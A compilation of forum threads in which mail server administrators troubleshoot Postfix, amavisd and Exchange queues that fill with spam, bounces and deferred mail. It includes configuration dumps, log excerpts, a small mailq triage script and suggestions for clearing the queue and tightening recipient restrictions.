    smtpd_tls_dcert_file =
    smtpd_tls_dh1024_param_file =
    smtpd_tls_dh512_param_file =
    smtpd_tls_dkey_file = $smtpd_tls_dcert_file
    smtpd_tls_key_file = /etc/certificates/mail.myDomain.com.key
    smtpd_tls_loglevel = 2
    smtpd_tls_received_header = no
    smtpd_tls_req_ccert = no
    smtpd_tls_session_cache_database =
    smtpd_tls_session_cache_timeout = 3600s
    smtpd_tls_wrappermode = no
    smtpd_use_pw_server = yes
    smtpd_use_tls = yes
    soft_bounce = no
    stale_lock_time = 500s
    strict_7bit_headers = no
    strict_8bitmime = no
    strict_8bitmime_body = no
    strict_mime_encoding_domain = no
    strict_rfc821_envelopes = no
    sun_mailtool_compatibility = no
    swap_bangpath = yes
    syslog_facility = mail
    syslog_name = postfix
    tls_daemon_random_bytes = 32
    tls_daemon_random_source =
    tls_random_bytes = 32
    tls_random_exchange_name = ${config_directory}/prng_exch
    tls_random_prng_update_period = 60s
    tls_random_reseed_period = 3600s
    tls_random_source =
    trace_service_name = trace
    transport_maps =
    transport_retry_time = 60s
    trigger_timeout = 10s
    undisclosed_recipients_header = To: undisclosed-recipients:;
    unknown_address_reject_code = 450
    unknown_client_reject_code = 450
    unknown_hostname_reject_code = 450
    unknown_local_recipient_reject_code = 550
    unknown_relay_recipient_reject_code = 550
    unknown_virtual_alias_reject_code = 550
    unknown_virtual_mailbox_reject_code = 550
    unverified_recipient_reject_code = 450
    unverified_sender_reject_code = 450
    verp_delimiter_filter = -=+
    virtual_alias_domains = $virtual_alias_maps
    virtual_alias_expansion_limit = 1000
    virtual_alias_maps = hash:/etc/postfix/virtual,hash:/var/mailman/data/virtual-mailman
    virtual_alias_recursion_limit = 1000
    virtual_destination_concurrency_limit = $default_destination_concurrency_limit
    virtual_destination_recipient_limit = $default_destination_recipient_limit
    virtual_gid_maps =
    virtual_mailbox_base =
    virtual_mailbox_domains = hash:/etc/postfix/virtual_domains
    virtual_mailbox_limit = 51200000
    virtual_mailbox_lock = fcntl
    virtual_mailbox_maps =
    virtual_minimum_uid = 100
    virtual_transport = lmtp:unix:/Volumes/Mail/imap/socket/lmtp
    virtual_uid_maps =

    I do have a few Windows clients. They have up to date virus protection but they could very well be infected with some malware. I haven't had the chance to run SpyBot on them.
    Sorry for the long postconf output.
    I did requeue all the messages with postsuper -r. I also put them all on hold (postsuper -h) which allowed for new messages to be delivered as usual. Deleting the queue was not an option. I am pretty sure now that it was a spam dictionary attack. But I am still concerned that this would effectively bring the server down.
    I looked into recipient restrictions but don't see any easy way to maintain an accurate list of my users. Is there a way to pull them from the LDAP directory? I guess I could do that with a perl script, shouldn't be too hard. Is there an easier way? Something built in?
    Anyway the server is fine now. As I said I put all the messages on hold then slowly released them back into the active queue. Once the server was able to get over its hang up it chewed through the remaining messages ok. This still brought my server down pretty much the entire day. Not acceptable in most countries.
    Any other ideas are welcome!
    Thanks,
    Josh
    shorter postconf output:
    alias_maps = hash:/etc/aliases,hash:/var/mailman/data/aliases
    always_bcc =
    bounce_queue_lifetime = 4h
    command_directory = /usr/sbin
    config_directory = /etc/postfix
    content_filter = smtp-amavis:[127.0.0.1]:10024
    daemon_directory = /usr/libexec/postfix
    debug_peer_level = 2
    default_destination_concurrency_limit = 6
    default_process_limit = 20
    enable_server_options = yes
    inet_interfaces = all
    initial_destination_concurrency = 15
    local_recipient_maps =
    luser_relay = emailadmin
    mail_owner = postfix
    mailbox_size_limit = 0
    mailbox_transport = cyrus
    mailq_path = /usr/bin/mailq
    manpage_directory = /usr/share/man
    maps_rbl_domains =
    maximal_backoff_time = 2700s
    maximal_queue_lifetime = 36h
    message_size_limit = 16777216
    minimal_backoff_time = 900s
    mydestination = $myhostname,localhost.$mydomain,myDomain.com
    mydomain_fallback = localhost
    myhostname = thestranger.com
    mynetworks = 127.0.0.1/32,10.0.0.0/24,10.0.8.0/24,10.0.1.0/24
    mynetworks_style = host
    newaliases_path = /usr/bin/newaliases
    owner_request_special = no
    queue_directory = /private/var/spool/postfix
    queue_run_delay = 900s
    readme_directory = /usr/share/doc/postfix
    recipient_delimiter = +
    relayhost =
    sample_directory = /usr/share/doc/postfix/examples
    sendmail_path = /usr/sbin/sendmail
    setgid_group = postdrop
    smtp_connect_timeout = 15s
    smtp_helo_timeout = 30s
    smtpd_client_restrictions = check_recipient_access hash:/etc/postfix/access, permit_sasl_authenticated, permit_mynetworks, check_sender_access hash:/etc/postfix/whiteList, reject_invalid_hostname, reject_non_fqdn_sender, reject_non_fqdn_recipient, reject_rbl_client dnsbl.njabl.org, reject_rbl_client sbl-xbl.spamhaus.org, reject_rbl_client bl.spamcop.net, reject_rbl_client cbl.abuseat.org
    smtpd_enforce_tls = no
    smtpd_pw_server_security_options = login,plain,cram-md5,gssapi
    smtpd_recipient_restrictions = check_recipient_access hash:/etc/postfix/access, permit_mynetworks, permit_sasl_authenticated, reject_invalid_hostname, reject_non_fqdn_sender, reject_non_fqdn_recipient, reject_unknown_sender_domain, reject_unauth_destination, check_sender_access hash:/etc/postfix/whiteList
    smtpd_sasl_auth_enable = yes
    smtpd_tls_cert_file = /etc/certificates//myDomain.com.crt
    smtpd_tls_key_file = /etc/certificates/myDomain.com.key
    smtpd_tls_loglevel = 2
    smtpd_use_pw_server = yes
    smtpd_use_tls = yes
    unknown_local_recipient_reject_code = 550
    virtual_alias_maps = hash:/etc/postfix/virtual,hash:/var/mailman/data/virtual-mailman
    virtual_mailbox_domains = hash:/etc/postfix/virtual_domains
    virtual_transport = lmtp:unix:/Volumes/Mail/imap/socket/lmtp

  • Mail queue filling up - Delivery Temporarily Suspended Connection Refused

    About 2 hours ago we stopped getting any email from our server. The mail queue is filling up. If I click on one of the messages in queue, it gives me a message of "delivery temporarily suspended: connect to 127.0.0.1[127.0.0.1]: connection refused".
    What happened????
    Thanks,
    Robert

    My configuration was running fine for months but suddenly every night amavisd stops running (I suppose after mailbfr ran). I have to launch amavisd manually with +sudo /bin/launchctl load -w /System/Library/LaunchDaemons/org.amavis.amavisd.plist+ every day.
    Maybe something is wrong with my org.amavis.amavisd.plist? Here it is:
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
    <key>Label</key>
    <string>org.amavis.amavisd</string>
    <key>OnDemand</key>
    <false/>
    <key>Program</key>
    <string>/usr/bin/amavisd</string>
    <key>ProgramArguments</key>
    <array>
    <string>amavisd</string>
    <string>foreground</string>
    </array>
    <key>ServiceIPC</key>
    <false/>
    <key>UserName</key>
    <string>_amavisd</string>
    </dict>
    </plist>

  • Mail queue filling with errors, is something broken?

    Back in SL, I was able to just look at the queue in server app and if it ever had anything in it, I knew it was a problem and I usually could deal with it.
    But in ML, you have to issue "mailq" in terminal to see it. So I did that a lot when first set up, and everything seemed fine.
    I just checked it recently and found hundreds of messages like this:
    0C8AA2B7E2D6
    9315 Sun Jan  4 09:14:13  [email protected]
    (host 127.0.0.1[127.0.0.1] said: 451 4.5.0 Error in processing, id=76490-02-4, quar+notif FAILED: temporarily unable to quarantine: 451 4.5.0 Local delivery(1) to /Library/Server/Mail/Data/scanner/virusmails failed: Mailbox file /Library/Server/Mail/Data/scanner/virusmails is executable, refuse to deliver at (eval 102) line 219., id=76490-02-4 at /Applications/Server.app/Contents/ServerRoot/usr/bin/amavisd line 15343. (in reply to end of DATA command))
    [email protected]
    I delete them and it fills up again.
    Can anyone please tell me what's happening here and how to fix it?
    Thanks a bunch,
    Scott

    Here it is:
    prepress:~ server2$ ls -dl /L*/Server/M*/D*/*/virus*
    -rwxr-x---  1 _amavisd  _amavisd  548758857 Dec 18 10:42 /Library/Server/Mail/Data/scanner/virusmails
    prepress:~ server2$
    Thanks Linc!

  • Mail Queue filling up with DSN failures

    So my Exchange 2010 queue viewer keeps filling up with failed DSNs. There is no sender (except for [email protected]). I have done some searching and the first thing that everyone usually mentions as a cause is SPAM. It's not SPAM. I know this for two reasons:
    1. We have a barracuda SPAM/AV firewall that all SMTP email goes through. None of these emails are there
    2. We can see the subject of the email. The subject is a cronjob email from our linux servers. "Undeliverable Cron <cronuser@>..." But there is no source email to be found. Our linux server is not sending any.
    Any idea what could be causing this?

    If they're DSNs, they could be sent from anywhere with a spoofed reply address.
    Ed Crowley MVP "There are seldom good technological solutions to behavioral problems."

  • Mail Queue Filling Up

    Came into the office this morning and everyone is complaining they didn't get any email over the weekend. I log into SA to notice over 300 emails stuck in the queue. I found a couple threads regarding this and this one particularly is almost my exact situation:
    http://discussions.apple.com/thread.jspa?messageID=1891076&
    With the exception of upgrading the OS. I did actually have to add a virtual IP address to the same NIC that has the IP for our email. I did this because I was having SSL issues:
    http://discussions.apple.com/thread.jspa?threadID=612479&tstart=0
    Since I wasn't adding a new IP and not so much changing an IP, I didn't use the "changeip" command. Following some of the instructions from the above mentioned thread, I ran "sudo postsuper -r ALL" and this didn't seem to help at all. I then issued a "/sbin/reboot" to restart the email server and now it is in the process of sending all the email that are in the queue. Send and receive email is working properly.
    So why the post since I have solved my own problem?
    Because it makes me nervous that after adding an additional real-world IP to the extra NIC installed on the server, it has been behaving like this.
    So... any thoughts or suggestions on how to prevent this in the future or how to fix this? Thanks.

    Ahhh! Yes, I did create an actual user for postmaster and am using it so I could have an additional email account in Mail.app to monitor email that was improperly addressed. Usually I find about 1-2 emails a week where someone improperly mis-spelled someone's address and therefore I send it on to the right place.
    Should I delete the "postmaster" account in WGM? But then how would I be able to check its email?
    Have a look in /etc/postfix/alias. The alias name is on the left (postmaster) and the name of the mail account used for it is on the right. Replace with your own short name or another (I usually set up a separate mailadmin user). But I don't really think that is causing your problem - it's the actual receiving undeliverable mail which is generating the bounces back out.
    Also in /etc/postfix/main.cf what's the difference between "myhostname" and "mydomain"? I have them both configured the same with "mail.domain.com". Should one be "domain.com" and the other "mail.domain.com"?
    myhostname is normally your hostname (eg mail.domain.com) - what you want your server to use in its 'helo' command. Ideally should be the same as your MX record (and PTR record for your IP). Ideally they should all match but sometimes difficult.
    mydomain - eg domain.com
    Note that you will have to put the domain into the Local Hosts Alias pane (if not already there) if you previously only had it as your myhostname.
    -david

  • Mail QUEUE keeps filling up 17000+ emails

    I am running OS 10.4.11 w/latest security updates. Approx 50 active email accounts but a high volume of emails. We have been shut down by our ISP for an open proxy (unsure if this is related or not). We keep getting thousands of emails flooding our mail queue from unknown sources to unknown addresses. I have read another post with similar issues and I want to update the postfix config to keep this overload of emails from reaching the queue. I am not that great with command line and would like a little help. I have read FRONT-LINE SPAM DEFENSE FOR MAIL SERVERS, and need just a bit of help getting started. ANY help will be appreciated.

    Using text wrangler and editing the main.cf file. I am also looking at the logs and here is what I had on the 31st when we got blocked by our ISP, it looks like just a bunch of spam flooding us with malformed names.
    Aug 31 09:44:04 mail postfix/smtp[4177]: warning: valid_hostname: empty hostname
    Aug 31 09:44:04 mail postfix/smtp[4177]: warning: malformed domain name in resource data of MX record for yaoo.com:
    Aug 31 09:44:05 mail postfix/smtp[3642]: warning: valid_hostname: empty hostname
    Aug 31 09:44:05 mail postfix/smtp[3642]: warning: malformed domain name in resource data of MX record for yuahoo.com:
    Aug 31 09:44:11 mail postfix/smtp[3699]: warning: valid_hostname: empty hostname
    Aug 31 09:44:11 mail postfix/smtp[3699]: warning: malformed domain name in resource data of MX record for yaho.com:
    Aug 31 09:44:13 mail postfix/smtp[3706]: warning: valid_hostname: empty hostname
    Aug 31 09:44:13 mail postfix/smtp[3706]: warning: malformed domain name in resource data of MX record for yahho.com:
    Aug 31 09:44:15 mail postfix/smtp[4167]: warning: valid_hostname: empty hostname
    Aug 31 09:44:15 mail postfix/smtp[4167]: warning: malformed domain name in resource data of MX record for yhaoo.com:
    Aug 31 09:44:15 mail postfix/smtp[4177]: warning: valid_hostname: empty hostname
    Aug 31 09:44:15 mail postfix/smtp[4177]: warning: malformed domain name in resource data of MX record for yhoo.com:
    Aug 31 09:44:21 mail postfix/smtp[3670]: warning: valid_hostname: empty hostname
    Aug 31 09:44:21 mail postfix/smtp[3670]: warning: malformed domain name in resource data of MX record for ahoo.com:
    Aug 31 09:44:21 mail postfix/smtp[3649]: warning: valid_hostname: empty hostname
    Aug 31 09:44:21 mail postfix/smtp[3649]: warning: malformed domain name in resource data of MX record for yahho.com:
    Aug 31 09:44:30 mail postfix/smtp[3669]: warning: valid_hostname: empty hostname
    Aug 31 09:44:30 mail postfix/smtp[3669]: warning: malformed domain name in resource data of MX record for yahooo.com:
    Aug 31 09:44:37 mail postfix/smtp[3669]: warning: valid_hostname: empty hostname
    Aug 31 09:44:37 mail postfix/smtp[3669]: warning: malformed domain name in resource data of MX record for yaho.com:
    Aug 31 09:44:38 mail postfix/smtp[3649]: warning: valid_hostname: empty hostname
    Aug 31 09:44:38 mail postfix/smtp[3649]: warning: malformed domain name in resource data of MX record for yaho.com:
    Aug 31 09:44:39 mail postfix/smtp[3701]: warning: valid_hostname: empty hostname
    Aug 31 09:44:39 mail postfix/smtp[3701]: warning: malformed domain name in resource data of MX record for yaoo.com:
    Aug 31 09:44:43 mail postfix/smtp[3646]: warning: valid_hostname: empty hostname
    Aug 31 09:44:43 mail postfix/smtp[3646]: warning: malformed domain name in resource data of MX record for yhaoo.com:
    Aug 31 09:44:47 mail postfix/smtp[3674]: warning: numeric domain name in resource data of MX record for disinc.com: 127.0.1.50
    Aug 31 09:44:49 mail postfix/smtp[4201]: warning: valid_hostname: empty hostname
    Aug 31 09:44:49 mail postfix/smtp[4201]: warning: malformed domain name in resource data of MX record for ayahoo.com:
    Aug 31 09:44:50 mail postfix/smtp[3655]: warning: valid_hostname: empty hostname
    Aug 31 09:44:50 mail postfix/smtp[3655]: warning: malformed domain name in resource data of MX record for atyahoo.com:
    Aug 31 09:44:51 mail postfix/smtp[1804]: warning: valid_hostname: empty hostname
    Aug 31 09:44:51 mail postfix/smtp[1804]: warning: malformed domain name in resource data of MX record for yahoon.net:
    Aug 31 09:44:52 mail postfix/smtp[1826]: warning: valid_hostname: empty hostname
    Aug 31 09:44:52 mail postfix/smtp[1826]: warning: malformed domain name in resource data of MX record for yaho.com:
    Aug 31 09:44:53 mail postfix/smtp[3701]: warning: valid_hostname: empty hostname
    Aug 31 09:44:53 mail postfix/smtp[3701]: warning: malformed domain name in resource data of MX record for yaho.com:
    Aug 31 09:44:54 mail postfix/smtp[3701]: warning: valid_hostname: empty hostname
    Aug 31 09:44:54 mail postfix/smtp[3701]: warning: malformed domain name in resource data of MX record for yhoo.com:
    Aug 31 09:44:56 mail postfix/smtp[4201]: warning: valid_hostname: empty hostname
    Aug 31 09:44:56 mail postfix/smtp[4201]: warning: malformed domain name in resource data of MX record for hyahoo.com:
    Aug 31 09:44:56 mail postfix/smtp[4197]: warning: valid_hostname: empty hostname
    Aug 31 09:44:56 mail postfix/smtp[4197]: warning: malformed domain name in resource data of MX record for yhoo.com:
    Aug 31 09:44:56 mail postfix/smtp[4196]: warning: valid_hostname: empty hostname
    Aug 31 09:44:56 mail postfix/smtp[4196]: warning: malformed domain name in resource data of MX record for yahooo.com:
    Aug 31 09:44:59 mail postfix/smtp[3646]: warning: valid_hostname: empty hostname
    Aug 31 09:44:59 mail postfix/smtp[3646]: warning: malformed domain name in resource data of MX record for yaoo.com:
    Aug 31 09:45:00 mail postfix/smtp[4197]: warning: valid_hostname: empty hostname
    Aug 31 09:45:00 mail postfix/smtp[4197]: warning: malformed domain name in resource data of MX record for yahho.com:
    Aug 31 09:45:14 mail postfix/smtp[3690]: warning: valid_hostname: empty hostname
    Aug 31 09:45:14 mail postfix/smtp[3690]: warning: malformed domain name in resource data of MX record for yahoo.net:
    Aug 31 09:45:16 mail postfix/smtp[3660]: warning: valid_hostname: empty hostname
    Aug 31 09:45:16 mail postfix/smtp[3660]: warning: malformed domain name in resource data of MX record for yhoo.com:
    Aug 31 09:45:17 mail postfix/smtp[3692]: warning: valid_hostname: empty hostname
    Aug 31 09:45:17 mail postfix/smtp[3692]: warning: malformed domain name in resource data of MX record for yahho.com:
    Aug 31 09:45:18 mail postfix/smtp[3645]: warning: valid_hostname: empty hostname
    Aug 31 09:45:18 mail postfix/smtp[3645]: warning: malformed domain name in resource data of MX record for yhaoo.com:
    Aug 31 09:45:20 mail postfix/smtp[4203]: warning: valid_hostname: empty hostname
    Aug 31 09:45:20 mail postfix/smtp[4203]: warning: malformed domain name in resource data of MX record for yahooomail.com:
    Aug 31 09:45:20 mail postfix/smtp[3649]: warning: valid_hostname: empty hostname
    Aug 31 09:45:20 mail postfix/smtp[3649]: warning: malformed domain name in resource data of MX record for yhaoo.com:
    Aug 31 09:45:24 mail postfix/smtp[3649]: warning: valid_hostname: empty hostname
    Aug 31 09:45:24 mail postfix/smtp[3649]: warning: malformed domain name in resource data of MX record for yahool.com:
    Aug 31 09:45:28 mail postfix/smtp[3649]: warning: valid_hostname: empty hostname
    Aug 31 09:45:28 mail postfix/smtp[3649]: warning: malformed domain name in resource data of MX record for yhaoo.com:
    Aug 31 09:45:28 mail postfix/smtp[3692]: warning: valid_hostname: empty hostname
    Aug 31 09:45:28 mail postfix/smtp[3692]: warning: malformed domain name in resource data of MX record for yahooo.com:
    Aug 31 09:45:35 mail postfix/smtp[3651]: warning: valid_hostname: empty hostname
    Aug 31 09:45:35 mail postfix/smtp[3651]: warning: malformed domain name in

  • Server Admin- Mail queue is this before or after its been checked as spam?

    Hi, we have been bombarded with shed loads of junk causing the mail queue to swell and slow down considerably, almost to a halt. I have now created the junkmail account and the notjunkmail accounts and am now trying to teach the server to sort itself out.
    However, in the queue we have MADEUP [email protected] and I'm deleting these manually as I can't mark these as junkmail. Will the server, once taught, be able to distinguish between the real users and the made-up ones?
    Also, is what is in the queue after the filtering, or what will be filtered?
    Thanks. Hope this makes sense.
    Oh, and if anyone knows any great bolt-on GUI spam filters for Mac server 10.4 I'd appreciate your advice... Thanks

    Sieve scripting is built in.
    Example vacation email script, forwarding and junk-mail processing are included in the Command Line manual.
    Some URLs...
    http://www.ietf.org/rfc/rfc3028.txt
    http://nfs-uxsup.csx.cam.ac.uk/~fanf2/hermes/doc/sieve/
    As for Postfix:
    http://www.stepwise.com/Articles/Workbench/eart.index.html
    http://www.cutedgesystems.com/software/PostfixEnabler/

  • What to do with mail stuck in mail queue?

    I think I have my web and e-mail server running fine, all mail from the users is coming and going as it should. But I have to delete the mail queue every two days or so because it is filling up with junk mail to unknown senders and users. I think everything is set up correctly and I do not have an open relay, but is there some way I can have it delete the junk mail in this queue by itself?

    Most likely you have postfix configured to accept any mail. Being for known or unknown users. Thus, mail for unknown users (mostly spam) gets only bounced at a later stage (cyrus/IMAP), which in turn creates those pesky Mailer-Daemon messages in your queue.
    Being spam, there is usually no proper return address, so those messages stay in your queue, until they expire after 5 days (default value).
    See my tutorial on how to improve Postfix' configuration here: http://osx.topicdesk.com/content/view/38/62/
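A queue triage sketch for the symptoms in these threads, added here as an example (not code from any poster): it parses `mailq` output in the layout quoted earlier on this page and separates MAILER-DAEMON bounces from messages deferred because the local content filter at 127.0.0.1 is refusing connections or failing. The sample queue, its addresses and the category names are constructed for illustration.

```python
import re
import sys
from collections import Counter

# Constructed sample in the layout printed by `mailq`; all addresses are placeholders.
SAMPLE_MAILQ = """\
-Queue ID- --Size-- ----Arrival Time---- -Sender/Recipient-------
0C8AA2B7E2D6     9315 Sun Jan  4 09:14:13  MAILER-DAEMON
(connect to mx.invalid.example[192.0.2.10]:25: Connection timed out)
                                         forged-sender@invalid.example

1A2B3C4D5E6F     2210 Sun Jan  4 09:15:02  MAILER-DAEMON
(Host or domain name not found. Name service error for name=typo.example type=MX: Host not found, try again)
                                         nobody@typo.example

2B3C4D5E6F70*    4100 Sun Jan  4 09:16:40  alice@corp.example
                                         bob@partner.example

3C4D5E6F7081     5120 Sun Jan  4 09:17:11  carol@corp.example
(delivery temporarily suspended: connect to 127.0.0.1[127.0.0.1]: Connection refused)
                                         dave@partner.example

-- 20 Kbytes in 4 Requests.
"""

# First line of an entry: queue ID, optional flag (* active, ! on hold), size, arrival time, sender.
ENTRY = re.compile(r"^(?P<qid>[0-9A-Za-z]+)(?P<flag>[*!]?)\s+(?P<size>\d+)\s+"
                   r"\w{3}\s+\w{3}\s+\d+\s+\d\d:\d\d:\d\d\s+(?P<sender>\S+)\s*$")

def parse_mailq(text):
    """Turn mailq output into a list of dicts, one per queued message."""
    entries, cur = [], None
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            cur = {"qid": m["qid"], "flag": m["flag"], "size": int(m["size"]),
                   "sender": m["sender"], "reason": "", "rcpts": []}
            entries.append(cur)
        elif cur is None or not line.strip():
            continue                              # column header or blank separator
        elif line.startswith("("):
            cur["reason"] = line.strip()          # deferral reason for this message
        elif line[0].isspace():
            cur["rcpts"].append(line.strip())     # indented recipient line
    return entries

def classify(entry):
    """Label one message by the most likely cause of it sitting in the queue."""
    reason = entry["reason"].lower()
    if "127.0.0.1" in reason and "connection refused" in reason:
        return "content-filter-down"    # Postfix cannot reach the local filter (e.g. amavisd)
    if "quarantine" in reason or "error in processing" in reason:
        return "content-filter-error"   # filter is reachable but failing
    if entry["sender"] == "MAILER-DAEMON":
        return "bounce"                 # non-delivery report generated by this server
    return "active" if entry["flag"] == "*" else "deferred"

def triage(text):
    """Return (entries, counts per category, recipient domains of queued bounces)."""
    entries = parse_mailq(text)
    counts = Counter(classify(e) for e in entries)
    bounce_domains = Counter(r.rsplit("@", 1)[-1].lower() for e in entries
                             if classify(e) == "bounce" for r in e["rcpts"])
    return entries, counts, bounce_domains

if __name__ == "__main__":
    # Reads real output when piped (mailq | python3 thisfile.py), else the constructed sample.
    text = SAMPLE_MAILQ if sys.stdin.isatty() else sys.stdin.read()
    entries, counts, domains = triage(text)
    print(dict(counts))
    print("bounce recipient domains:", domains.most_common(10))
    print("bounce queue IDs to review:", [e["qid"] for e in entries if classify(e) == "bounce"])
```

A queue dominated by `bounce` entries points at mail being accepted for unknown recipients and bounced afterwards; a queue dominated by `content-filter-down` means nothing is being delivered until the filter is running again.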

  • How  to look at mail queue

    I have installed Collaboration Suite 9.0.3, and am curious to know how to look at the mail queue on the OCS server, and more specifically, how do I delete emails in the queue? Somebody apparently found us during the installation of this server before I could lock it down with spam rules, and I have a ton of junk emails stuck in the queue that won't go anywhere. How do I get rid of those messages? They are literally using up the server resources after about 5 hours of the server trying to send them.
    Thanks,
    Michael

    Well, I guess that's part of the problem too. I'm not sure I have emails in the queue. I have the OCS server set up with the relay host set to another server on the network running sendmail. If I stop the smtp_out service on the OCS server, and then start it again, I see a bunch of messages being sent to the relay server to be delivered, most of them spam as far as I can tell. The sendmail server is set to reject those messages, so it does not try to deliver them and therefore does not put them in the queue on that server. However, regardless of restarting smtp_out, restarting Unified Messaging, restarting OCS, or restarting the entire server, those messages continue to remain in what I'm assuming is the queue on the OCS server. Does that make any sense? From what I can get from the documentation, they must be sitting in the mailstore database somewhere, and I'm wondering if there is a query I can run to at least look and see what is there, and preferably delete them. Otherwise, I guess I have to wait 5 days for the server to finally give up.
    Any ideas?
    Thanks,
    Michael

  • Server Admin only shows 201 messages in Mail Queue

    This issue has been haunting me since 10.5.0 and I can't seem to get rid of it. It's not crucial, but very obnoxious. In Server Admin (from multiple computers) the mail queue will only show a maximum of 201 messages. If there are more than that I have a cryptic "message" at the end of the list that has a message ID of "FFFFFFFFFFFF" and the Recipients Field has [...]
    I would love to be able to see all the messages in my queue if possible, but haven't found anywhere to fix this.
    Any help would be very appreciated.

    Thanks Alex. We aren't bouncing spam on our mail server, but I do notice that a lot of the mail is from MAILER-DAEMON. I'm assuming it's "User not Found" messages from hosts that don't really exist. I've tweaked the server using some suggestions from osx.topicdesk.com to clear some of those out, but it hasn't been 100% effective.
    I think part of the issue is that the server is a dual G4 Xserve and is scanning junk mail on all messages. I assume that those two factors contribute to the backup of mail in the queue.
    As for volume of mail, we receive 100k a month.

  • Stuck in the Mail Queue

    We lost our internet connection yesterday for over 12 hours. It is back on now and the mailserver is working fine BUT...
    a) Nothing has arrived from the time we were out ie: I have everything prior to the lost connection and everything since, but nothing from the lost 12 hours. It is like it never existed!
    b) I have a group of emails that are stuck fast in the mailserver queue (Server Admin, Mail, Maintenance, Mail Queue). I can delete some that I know to be spam but when I click 'Retry' nothing happens.
    Any ideas?
    (Server 10.5.2)

    Open terminal and issue:
    sudo postsuper -r ALL
    (Give it time and don't force the queue continuously. If it doesn't start sending after a few minutes, check /var/log/mail.log for clues)

  • Mail stuck in the Mail Queue

    For reasons I have not yet understood, my 10.5.2 mailserver stopped delivering mail. After a few restarts it is now running again but;
    All the mail that arrived while it was stopped is now stuck in the Mail Queue. How can I get it to deliver this stuck mail?

    pterobyte wrote:
    If they can't get to the content filter on the first try, maybe it's overloaded? How busy is your machine?
    It's a new installation of Leopard Server on an internal drive, the CPU navigate from 0 to 20% so it's not here. I used spamtrainer to import the database from the old drive (Tiger Server) and the mail store is on a RAID disk so I just had to change the default mail location in the right pane. I just restarted the server on the Tiger Server disk and everything is fine there.
    Requeuing does not start the content filter, so if it were off, it'd still be off. So since it is running, it looks like it can't keep up.
    Sorry, I do my best to be understandable :->
    I just made tries to see if mails would be delivered once the spam and virus filter is off and saw that mails were not delivered at all.
    Is this the normal behavior ?
    This problem of the content filter is probably linked to what I said in another thread.
    I cannot uncheck "Attach subject tag" in Server Admin. If I uncheck the spam filter and virus filter then mails are not delivered too.
    I doubt it is linked (unless you "play" with Server Admin while troubleshooting the queue). As I mentioned above, amavisd, doesn't run just "a bit".
    You can always change the amavisd and postfix settings yourself.
    If I knew what to change and where I probably would do it :->
    I'm just scared about how many things don't work as expected once Leopard Server is installed.
    Lot of problems with SMB too and as we have only one machine here I must reboot the server on Tiger if I don't want everybody here to kill me :->>
    Maybe some files cannot be read/write...
    If it was a permission issue, requeued mail would still hit the same issues.
    Yes... I thought about that.
    Do you think that it could help to download the 10.5.2 combo update and to reinstall it ?
    Doubt it, but it probably won't hurt.
    Will try it as soon as I can reboot the server on Leopard. It seems that someone will not leave the office like others will do today.
    Thanks for your help.

  • Huge Mail Queue

    Somebody please help me!!!!
    I recently realised that the mail server part of OSX server was switched on without being configured correctly and as a result someone was relaying spam through it.
    I know virtually nothing about Terminal but have managed to delete the mail.log's which were nearly 1gb and the mailaccess.log but they have started to grow again even though mail is now off!
    If I try to view the Mail Queue in server admin it grinds to a halt so I am guessing that I must have a huge backlog of messages in the queue. Is there an easy way of clearing the queue without using server admin?
    Thanks,
    Mark

    After you take care of the immediate issue....
    I would try and find out how the mail server was enabled.
    You could have an intruder who is using your machine for their own purpose.
    Do you have port 22 (SSH) open to the outside world?
    You might want to check your logs, especially /var/log/secure.log
    Jeff
